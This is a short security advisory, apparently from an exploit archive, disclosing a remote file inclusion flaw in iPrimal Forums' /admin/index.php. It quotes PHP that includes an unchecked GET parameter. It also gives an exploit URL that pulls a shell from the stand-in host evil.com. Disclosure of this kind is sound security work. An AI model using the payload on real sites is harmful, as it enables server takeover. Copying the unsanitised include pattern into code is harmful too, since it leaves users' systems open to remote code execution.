Home / os / win2k

iPrimal-rfi.txt

Posted on 09 November 2006

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ iPrimal Forums Remote File Inclusion Download:http://ipigroup.org/downloads/forums.zip Found by Bl0od3r ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerable Code: #line 126-129 ..... if($_GET['p'] == ''){ echo 'Please select an item from the menu above.'; }else{ include($_GET['p'].'.php'); ..... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected File: /admin/index.php =] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability: http://host.com/admin/index.php?p=http://evil.com/shell.txt? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetz:evilcookie,eddy14,matrix_killer Special Greetz to:str0ke!

 

TOP